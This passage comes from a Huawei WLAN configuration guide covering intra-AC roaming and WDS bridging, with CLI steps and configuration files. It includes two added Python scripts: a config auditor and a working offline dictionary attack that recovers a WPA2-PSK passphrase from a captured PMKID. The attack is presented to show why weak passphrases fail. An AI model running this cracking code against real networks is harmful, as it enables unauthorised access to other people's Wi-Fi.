l In this example, the security policy is WPA2-PSK-AES. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the
same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, a large number of broadcast packets
will be transmitted in the VLANs, and WLAN users on different APs can communicate
directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.


l The following table lists applicable products and versions.

Table 16-25 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN
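The VLAN, security-policy and profile notes above can be checked mechanically against the AC's configuration file. The following added example (not Huawei's code) parses a configuration file in the format shown in this chapter and reports violations; the sample files are constructed and the <encrypted> pass-phrase is a placeholder.

```python
"""Check an AC configuration file against the configuration notes above.
Added example, not Huawei's code. It reads the AC configuration-file format used in
this chapter (keywords as printed; indentation is ignored, so the flattened listings
work too) and reports what the notes warn about: a tunnel-mode VAP whose service
VLAN equals the management VLAN, a security profile that is not WPA2 with AES, and
VAPs serving one SSID through different profiles, which breaks roaming. The sample
files are constructed; <encrypted> stands in for the cipher-text pass-phrase."""
from collections import defaultdict


def parse_ac_config(text):
    """Return (management VLAN, security/ssid/vap profiles, AP-group VAP bindings)."""
    mgmt_vlan, sec, ssid, vap, bindings = None, {}, {}, {}, []
    ctx, radio = None, None  # profile being defined, radio inside an ap-group
    for raw in text.splitlines():
        tok = raw.split()
        if not tok or tok[0] == "#":
            continue
        if tok[:3] == ["capwap", "source", "interface"]:  # vlanif100 or vlanif 100
            mgmt_vlan = int("".join(tok[3:]).replace("vlanif", ""))
            continue
        # "<kind> name <id>" opens a definition; "<kind> <id>" is a reference.
        if len(tok) >= 3 and tok[1] == "name":
            ctx, radio = (tok[0], tok[2]), None
            if tok[0] == "vap-profile":
                vap[tok[2]] = {"forward": None, "vlan": None, "ssid": None, "sec": None}
            continue
        if ctx is None:
            continue
        kind, name = ctx
        if kind == "security-profile" and tok[0] == "security":
            sec[name] = tok[1:]  # e.g. ['wpa2', 'psk', 'pass-phrase', '...', 'aes']
        elif kind == "ssid-profile" and tok[0] == "ssid":
            ssid[name] = tok[1]
        elif kind == "vap-profile":
            if tok[0] == "forward-mode":
                vap[name]["forward"] = tok[1]
            elif tok[:2] == ["service-vlan", "vlan-id"]:
                vap[name]["vlan"] = int(tok[2])
            elif tok[0] == "ssid-profile":
                vap[name]["ssid"] = tok[1]
            elif tok[0] == "security-profile":
                vap[name]["sec"] = tok[1]
        elif kind == "ap-group":
            if tok[0] == "radio":
                radio = int(tok[1])
            elif tok[0] == "vap-profile":
                bindings.append((name, radio, tok[1]))
    return mgmt_vlan, sec, ssid, vap, bindings


def audit(text):
    """Return a list of findings; an empty list means the notes are satisfied."""
    mgmt_vlan, sec, ssid, vap, bindings = parse_ac_config(text)
    findings = []
    for name, v in vap.items():
        if v["forward"] == "tunnel" and mgmt_vlan is not None and v["vlan"] == mgmt_vlan:
            findings.append(f"vap-profile {name}: service VLAN {v['vlan']} equals the management VLAN in tunnel forwarding mode")
        policy = sec.get(v["sec"], [])
        if not (len(policy) >= 2 and policy[0] == "wpa2" and policy[-1] == "aes"):
            findings.append(f"vap-profile {name}: security profile {v['sec']} is not WPA2+AES ({' '.join(policy) or 'missing'})")
    # Roaming needs every AP serving an SSID to use the same SSID and security profiles;
    # differently named profiles are flagged even if their contents happen to match.
    by_ssid = defaultdict(set)
    for _group, _radio, vname in bindings:
        v = vap[vname]
        by_ssid[ssid.get(v["ssid"])].add((v["ssid"], v["sec"]))
    for name, combos in by_ssid.items():
        if len(combos) > 1:
            findings.append(f"SSID {name}: VAPs bound with different profiles {sorted(combos)}; roaming between those APs will fail")
    return findings


# Constructed copy of the AC configuration file of the intra-AC roaming example.
GOOD_CONFIG = """\
capwap source interface vlanif100
wlan
 security-profile name wlan-security
  security wpa2 psk pass-phrase <encrypted> aes
 ssid-profile name wlan-ssid
  ssid wlan-net
 vap-profile name wlan-vap1
  forward-mode tunnel
  service-vlan vlan-id 101
  ssid-profile wlan-ssid
  security-profile wlan-security
 ap-group name ap-group1
  radio 0
   vap-profile wlan-vap1 wlan 1
  radio 1
   vap-profile wlan-vap1 wlan 1
"""

# Constructed variant violating all three notes: service VLAN 100 with tunnel forwarding,
# an open security profile, and a second AP group serving wlan-net with other profiles.
BAD_CONFIG = (GOOD_CONFIG.replace("vlan-id 101", "vlan-id 100")
              .replace("  security-profile wlan-security", "  security-profile wlan-open")
              + " security-profile name wlan-open\n  security open\n"
              + " vap-profile name wlan-vap2\n  forward-mode tunnel\n  service-vlan vlan-id 101\n"
              + "  ssid-profile wlan-ssid\n  security-profile wlan-security\n"
              + " ap-group name ap-group2\n  radio 0\n   vap-profile wlan-vap2 wlan 1\n")
```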

Networking Requirements
A small enterprise needs to provide WLAN services for employees. Since the WLAN needs
to cover only a small area, one AC is deployed to manage APs. To differentiate department
management, employees are assigned different subnets by department. The enterprise expects
that users can move within the enterprise with nonstop service transmission.

As shown in Figure 16-11, an AC provides services for enterprise employees. It connects to
AP_1 and AP_2 through Switch_1 and Switch_2 respectively.


Figure 16-11 Configuring intra-AC roaming
[Figure: Internet - AC (GE0/0/1 to Switch_1, GE0/0/2 to Switch_2) - Switch_1 and Switch_2 (GE0/0/2 to the AC, GE0/0/1 to the AP) - AP_1 and AP_2; the STA roams between AP_1 and AP_2. Management VLAN: VLAN 100. Service VLAN: VLAN 101.]

Data planning
DHCP server: The AC functions as a DHCP server to assign IP addresses to the STAs and APs.
IP address pool for the APs: 10.23.100.2-10.23.100.254/24
IP address pool for the STAs: 10.23.101.2-10.23.101.254/24
AC's source interface address: VLANIF 100: 10.23.100.1/24
AP group:
l Name: ap-group1
l Referenced profile: VAP profile wlan-vap1 and regulatory domain profile domain
Regulatory domain profile:
l Name: domain
l Country code: CN
SSID profile:
l Name: wlan-ssid
l SSID name: wlan-net
Security profile:
l Name: wlan-security
l Security policy: WPA2+PSK+AES
l Password: a1234567
VAP profile:
l Name: wlan-vap1
l Forwarding mode: tunnel forwarding
l Service VLAN: VLAN 101
l Referenced profile: SSID profile wlan-ssid and security profile wlan-security

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure parameters used for communication between the AC and APs to transmit
CAPWAP packets.
2. Configure the AC to function as a DHCP server to assign IP addresses to the STAs and
APs.
3. Configure basic WLAN services so that users can connect to the wireless network.

Procedure
Step 1 Configure the switches and the AC so that the AC can communicate with the APs.

# On Switch_1, create VLAN 100 (management VLAN). Add GE0/0/1 connected to AP_1
and GE0/0/2 connected to AC to VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname Switch_1
[Switch_1] vlan batch 100
[Switch_1] interface gigabitethernet 0/0/1
[Switch_1-GigabitEthernet0/0/1] port link-type trunk
[Switch_1-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_1-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[Switch_1-GigabitEthernet0/0/1] quit
[Switch_1] interface gigabitethernet 0/0/2
[Switch_1-GigabitEthernet0/0/2] port link-type trunk
[Switch_1-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[Switch_1-GigabitEthernet0/0/2] quit

# On Switch_2, create VLAN 100 (management VLAN). Add GE0/0/1 connected to AP_2
and GE0/0/2 connected to AC to VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname Switch_2
[Switch_2] vlan batch 100
[Switch_2] interface gigabitethernet 0/0/1
[Switch_2-GigabitEthernet0/0/1] port link-type trunk
[Switch_2-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_2-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[Switch_2-GigabitEthernet0/0/1] quit
[Switch_2] interface gigabitethernet 0/0/2
[Switch_2-GigabitEthernet0/0/2] port link-type trunk
[Switch_2-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[Switch_2-GigabitEthernet0/0/2] quit


# On the AC, add GE0/0/1 connected to Switch_1 and GE0/0/2 connected to Switch_2 to
VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 to 102
[AC] interface gigabitethernet 0/0/1
[AC-GigabitEthernet0/0/1] port link-type trunk
[AC-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet0/0/1] quit
[AC] interface gigabitethernet 0/0/2
[AC-GigabitEthernet0/0/2] port link-type trunk
[AC-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[AC-GigabitEthernet0/0/2] quit

Step 2 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs.
# Configure the AC as the DHCP server to allocate IP addresses to APs from the IP address
pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101 and VLANIF 102.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 255.255.255.0
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.23.101.1 255.255.255.0
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 3 Configure the APs to go online.


# Create AP group ap-group1.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain
[AC-wlan-regulate-domain-domain] country-code cn
[AC-wlan-regulate-domain-domain] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import APs offline on the AC and add APs to AP group ap-group1. Assume that the type of
AP_1 and AP_2 is AP6010DN-AGN and their MAC addresses are 60de-4476-e360 and dcd2-
fc04-b500 respectively.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1.
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name ap1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
[AC-wlan-view] ap-id 1 ap-mac dcd2-fc04-b500
[AC-wlan-ap-1] ap-name ap2
[AC-wlan-ap-1] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit

# After the APs are powered on, run the display ap all command to check the AP state. If the
State field displays nor, the APs have gone online.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [2]
--------------------------------------------------------------------------------------
ID MAC            Name Group     IP            Type         State STA Uptime
--------------------------------------------------------------------------------------
0  60de-4476-e360 ap1  ap-group1 10.23.100.254 AP6010DN-AGN nor   0   15S
1  dcd2-fc04-b500 ap2  ap-group1 10.23.100.253 AP6010DN-AGN nor   0   10S
--------------------------------------------------------------------------------------
Total: 2

Step 4 Configure basic WLAN services on the AC.

# Create security profile wlan-security and set the security policy in the profile.
NOTE

In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.

[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create VAP profile wlan-vap1, set the data forwarding mode and service VLAN, and
apply the security profile wlan-security and SSID profile wlan-ssid to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap1
[AC-wlan-vap-prof-wlan-vap1] forward-mode tunnel
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap1] service-vlan vlan-id 101
[AC-wlan-vap-prof-wlan-vap1] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap1] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap1] quit

# Bind VAP profile wlan-vap1 to AP group ap-group1, and apply the VAP profile to radio 0
and radio 1 of the APs.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 5 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 6 Verify the configuration.

The AC automatically delivers WLAN service configuration to the APs. After the service
configuration is complete, run the display vap ssid wlan-net command to check VAP
information. If Status in the command output is displayed as ON, the VAPs have been
successfully created on AP radios.
[AC-wlan-view] display vap ssid wlan-net
WID : WLAN ID
--------------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID          Status Auth type STA SSID
--------------------------------------------------------------------------------------
0     ap1     0    1   60DE-4476-E360 ON     WPA2-PSK  0   wlan-net
0     ap1     1    1   60DE-4476-E370 ON     WPA2-PSK  0   wlan-net
0     ap2     0    1   DCD2-FC04-B500 ON     WPA2-PSK  0   wlan-net
0     ap2     1    1   DCD2-FC04-B510 ON     WPA2-PSK  0   wlan-net
--------------------------------------------------------------------------------------
Total: 2

In the coverage area of AP_1, connect the STA to the wireless network with SSID wlan-net
and enter the password a1234567. After the STA successfully associates with the network,
run the display station ssid wlan-net command on the AC. The command output shows that
the STA with MAC address e019-1dc7-1e08 has associated with AP_1.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
------------------------------------------------------------------------------------
STA MAC        AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
------------------------------------------------------------------------------------
e019-1dc7-1e08 0     ap1     1/1     5G   11n  46/59 -57  101  10.23.101.254
------------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1

When the STA moves from the coverage area of AP_1 to that of AP_2, run the display
station ssid wlan-net command on AC. The command output shows that the STA has
associated with AP_2.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
------------------------------------------------------------------------------------
STA MAC        AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
------------------------------------------------------------------------------------
e019-1dc7-1e08 1     ap2     1/1     5G   11n  46/59 -58  101  10.23.101.254
------------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1

Run the display station roam-track sta-mac e019-1dc7-1e08 command on AC to check the
STA roaming track.
[AC-wlan-view] display station roam-track sta-mac e019-1dc7-1e08
Access SSID:wlan-net
Rx/Tx: link receive rate/link transmit rate(Mbps)
------------------------------------------------------------------------------------------
L2/L3 AC IP       AP name Radio ID BSSID          TIME                In/Out RSSI Out Rx/Tx
------------------------------------------------------------------------------------------
--    10.23.100.1 ap1     1        60de-4476-e360 2016/02/07 17:48:30 -57/-58     46/65
L2    10.23.100.1 ap2     1        dcd2-fc04-b500 2016/02/07 17:54:50 -58/-       -/-
------------------------------------------------------------------------------------------
Number: 1

----End

Configuration Files
l Configuration file of Switch_1
#
sysname Switch_1
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of Switch_2


#
sysname Switch_2
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 102
#
dhcp enable
#

interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
capwap source interface vlanif100
#
wlan
security-profile name wlan-security
security wpa2 psk pass-phrase %^%#]:krYrz_r<ee}|Cq@9V(W{ZD$"\-R-HD_y.4#U4,%^%# aes
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap1
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
regulatory-domain-profile name domain
ap-group name ap-group1
regulatory-domain-profile domain
radio 0
vap-profile wlan-vap1 wlan 1
radio 1
vap-profile wlan-vap1 wlan 1
ap-id 0 ap-mac 60de-4476-e360
ap-name ap1
ap-group ap-group1
ap-id 1 ap-mac dcd2-fc04-b500
ap-name ap2
ap-group ap-group1
#
return
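The VAP above authenticates STAs with WPA2-PSK and the passphrase a1234567, and the WDS example in the next section protects its bridge links with the same policy. The following Python script is an added example, not code from this Huawei document: it derives the PMK from passphrase and SSID exactly as WPA2-Personal does (PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output), computes the RSN PMKID that an AP sends in the first frame of the 4-way handshake, and runs an offline dictionary attack against that PMKID. The SSID, the passphrase, the BSSID of ap1 and the STA MAC are taken from the page; the wordlist is constructed for the example. It shows why a short, guessable passphrase gives no real protection: every input except the passphrase is public, so anyone who captures one PMKID can test candidates offline at whatever rate their hardware allows.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Values taken from the page: SSID wlan-net, passphrase a1234567, the BSSID of
# ap1 radio 0 and the MAC address of the associated STA.
SSID = "wlan-net"
PASSPHRASE = "a1234567"
AP_MAC = "60de-4476-e360"
STA_MAC = "e019-1dc7-1e08"


def mac_bytes(mac: str) -> bytes:
    """Convert a Huawei-style MAC (xxxx-xxxx-xxxx) or a colon-separated MAC to 6 bytes."""
    raw = bytes.fromhex(mac.replace("-", "").replace(":", ""))
    if len(raw) != 6:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return raw


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PSK mapping (IEEE 802.11i): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits).
    The SSID is the only salt, so one precomputation serves every client of that SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA2 passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> bytes:
    """RSN PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA). The AP includes it in the
    first EAPOL frame of the 4-way handshake, so a sniffer needs no client traffic at all."""
    data = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def recover_passphrase(observed_pmkid: bytes, ssid: str, ap_mac: str, sta_mac: str,
                       candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack against a captured PMKID. Only the 4096 PBKDF2 iterations
    slow the attacker down; a weak passphrase falls to a small wordlist."""
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            continue  # cannot be a valid WPA2 passphrase, skip without hashing
        if hmac.compare_digest(pmkid(derive_pmk(cand, ssid), ap_mac, sta_mac), observed_pmkid):
            return cand
    return None


# Constructed wordlist for the example; a real attack uses millions of entries or a mask.
WORDLIST = ["password", "12345678", "huawei123", "a1234567", "wlan-net1"]

if __name__ == "__main__":
    pmk = derive_pmk(PASSPHRASE, SSID)
    captured = pmkid(pmk, AP_MAC, STA_MAC)  # what a sniffer sees in EAPOL message 1
    print("PMK   :", pmk.hex())
    print("PMKID :", captured.hex())
    print("found :", recover_passphrase(captured, SSID, AP_MAC, STA_MAC, WORDLIST))
```

The same derivation applies to the WDS security profile in the next section, where the passphrase protects a bridge carrying a whole service VLAN rather than a single client: a dedicated, long, random PSK for WDS links is the practical consequence.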

16.11 Example for Configuring the WLAN Service Using WDS Technology
WDS Overview
A wireless distribution system (WDS) connects two or more wired or wireless LANs using
wireless links to establish a large network.
On a traditional WLAN network, APs connect to an AC through wired uplinks. However,
wired connections are difficult or costly to implement in some areas such as tunnels and
docks. WDS technology can be used in these areas to connect APs to an AC using wireless
links. This technology facilitates WLAN deployment in complex geographical environments,
reduces network deployment cost, allows flexible networking, and makes the network easy to
expand.
APs on a WDS network work in any of the following modes:

l Root: A root AP connects to an AC using a wired link and connects to a middle or leaf
AP using a wireless link (the root AP's downlink).
l Middle: A middle AP is an intermediate node between an upstream root AP and a
downstream leaf AP. It connects to the root and leaf APs using wireless links.
l Leaf: A leaf AP connects to a root or middle AP using an uplink wireless link.
Both WDS and Mesh technologies can implement wireless bridging between APs. A WDS
network supports a maximum of three hops (for example, a WDS link established along a root
node, a middle node, and a leaf node is a three-hop link), whereas a Mesh network supports a
maximum of eight hops. A WDS network has a tree topology and does not support link
redundancy between nodes. A Mesh network has a Mesh topology and supports link
redundancy between nodes. Therefore, a Mesh network is more reliable than a WDS network.
You can choose WDS or Mesh technology to deploy wireless bridging between APs
according to your needs.

Configuration Notes
l On a WDS or Mesh network, an 802.11ac AP cannot interoperate with non-802.11ac
APs regardless of the radio types used by the AP. Only 802.11ac APs can interoperate
with each other.
NOTE
Among all WDS- or Mesh-capable APs, the AP5030DN, AP5130DN, AP8130DN, AP8030DN,
AP4030DN, AP4130DN, AP9131DN, AP9132DN, AP6050DN, AP6150DN, AP7050DE, AP7050DN-
E, AP4030TN, AP4050DN-E, and AP4050DN-HD are 802.11ac APs.
l If radio 0 of the AP8130DN is configured to work on the 5 GHz frequency band and
used for WDS or Mesh services, the software version of the AP connected to the
AP8130DN must be V200R005C10 or later.
l When planning a WDS network, pay attention to the following:
– The back-to-back WDS networking involves two WDS networks. A single WDS
network cannot form a back-to-back WDS network.
– Only one root node exists on the WDS network.
– A middle node sets up WDS links only with the leaf node and root node. Middle
nodes do not set up WDS links between each other.
– Each WDS link allows a maximum of three hops (a 3-hop WDS link includes a root
node, a middle node, and a leaf node).
– Each node on the WDS link supports a maximum of six subnodes.
l WDS and Mesh technologies cannot be used on the same network.
l If WDS and Mesh services are configured on an AP radio, WIDS, spectrum analysis, or
WLAN location on the radio does not take effect.
l The following table lists applicable products and versions.

Table 16-26 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
l V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP5030DN, AP5130DN, AP8130DN, AP8030DN, AP4030DN, AP4130DN, AP3030DN, AP9131DN, AP9132DN, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
l V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP5030DN, AP5130DN, AP8130DN, AP8030DN, AP4030DN, AP4130DN, AP3030DN, AP9131DN, AP9132DN
l V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP5030DN, AP5130DN, AP8130DN, AP8030DN, AP4030DN, AP4130DN

Networking Requirements
An enterprise has three areas: Area A, Area B, and Area C. In the office environment, AP_1
in Area A can be connected to the AC through a network cable; AP_2 and AP_3 in Area B
can be connected through a cable but cannot be connected to the AC in wired mode; Area C is
near Area B but AP_4 in Area C cannot be connected to the AC through a network cable
either. The enterprise requires that APs be connected to each other in back-to-back WDS
mode and go online on the AC to provide network services for STAs in VLAN 101, as shown
in Figure 16-12:


Figure 16-12 Networking for configuring back-to-back WDS

Data Planning
Before configuring the WDS service, determine the types and MAC addresses of the APs
used as WDS bridges. The following table provides the data plan for this example.

NOTE
The APs used in this example are AP6010DN-AGN.

Table 16-27 AP data required for completing the configuration


AP Type MAC

AP_1 AP6010DN-AGN 60de-4474-9640

AP_2 AP6010DN-AGN dcd2-fc04-b500

AP_3 AP6010DN-AGN dcd2-fcf6-76a0

AP_4 AP6010DN-AGN 60de-4476-e360

The following provides data planning for WDS service configuration.

Table 16-28 Data planning

Item: VLAN
l Management VLAN: VLAN 100
l Service VLAN: VLAN 101

Item: IP address of the AC's source interface
l VLANIF 100: 10.23.100.1/24

Item: WDS profile
l wds-net1 (WDS profile used by AP_1): WDS mode root, referencing WDS whitelist wds-list1, permitting access only from AP_2
l wds-net2 (WDS profile used by AP_3): WDS mode root, referencing WDS whitelist wds-list2, permitting access only from AP_4
l wds-net3 (WDS profile used by AP_2 and AP_4): WDS mode leaf, referencing no WDS whitelist

Item: WDS role
l AP_1: root
l AP_2: leaf
l AP_3: root
l AP_4: leaf

Item: WDS name
l wds-net

Item: WDS whitelist
l wds-list1: contains the MAC address of AP_2 and is bound to AP_1.
l wds-list2: contains the MAC address of AP_4 and is bound to AP_3.

Item: Radio used by WDS
Radio 1 (AP_1 and AP_2):
l Bandwidth: 40mhz-plus
l Channel: 157
l Radio coverage distance parameter: 4 (unit: 100 m)
Radio 1 (AP_3 and AP_4):
l Bandwidth: 40mhz-plus
l Channel: 149
l Radio coverage distance parameter: 4 (unit: 100 m)

Item: Security profile
l Name: wds-sec
l Security policy: WPA2+PSK+AES
l Password type: PASS-PHRASE
l Password: a1234567

Item: AP group
l wds-root1: AP_1
l wds-root2: AP_3
l wds-leaf1: AP_2
l wds-leaf2: AP_4. If the wired interface of AP_4 is connected to a Layer 2 network, a wired port profile needs to be configured for AP_4. Therefore, AP_2 and AP_4 are added to two separate AP groups.

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure WDS links in Area A and Area B so that AP_1 and AP_2 can go online on the
AC.
2. Configure Switch_C to enable AP_2 and AP_3 to communicate through the wired
network.
3. Configure WDS links in Area B and Area C so that AP_4 can go online on the AC.

Procedure
Step 1 Configure the network so that the AC can communicate with AP_1 and AP_2 can communicate with AP_3.
# Configure access switch Switch_B. Add GE0/0/1 of Switch_B to VLAN 100 (management
VLAN) and set the PVID of the interface to VLAN 100 so that untagged CAPWAP traffic from AP_1 is placed in the management VLAN. Configure GE0/0/1 and GE0/0/2 to
